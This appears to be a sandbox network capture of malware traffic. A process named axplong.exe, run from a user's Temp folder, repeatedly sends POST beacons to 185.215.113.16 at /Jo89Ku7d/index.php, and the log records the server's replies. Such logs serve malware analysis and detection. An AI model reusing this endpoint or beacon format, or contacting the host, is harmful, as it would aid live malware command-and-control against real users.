Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:06.314284086 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:07.054560900 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.8	49771	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:07.171538115 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:07.884605885 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.8	49772	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:07.894144058 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:08.633831024 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.8	49773	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:08.748604059 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:09.455537081 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.8	49774	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:09.464039087 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:10.312846899 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.8	49775	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:10.436522007 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:11.134490013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:03:11.141901016 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:11.365715027 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.8	49776	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:11.486489058 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:12.195040941 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:03:12.440891981 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:12.666821957 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.8	49777	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:12.780448914 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:13.473465919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.8	49778	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:13.483611107 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:14.206523895 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.8	49779	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:14.327819109 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:15.021306038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.8	49780	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:15.255455017 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:15.838093042 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.8	49781	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:15.960305929 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:16.646750927 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.8	49782	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:16.655821085 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:17.389102936 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.8	49783	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:17.499846935 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:18.190360069 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.8	49784	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:18.200252056 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:18.955430031 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 27, 2024 07:03:19.261369944 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.8	49785	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:19.262376070 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:19.975303888 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.8	49786	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:19.984069109 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:20.697779894 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.8	49787	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:20.811088085 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.8	49788	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:20.829135895 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:21.645081043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.8	49789	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:21.769092083 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:22.467437029 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.8	49790	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:22.493982077 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:23.207526922 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.8	49791	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
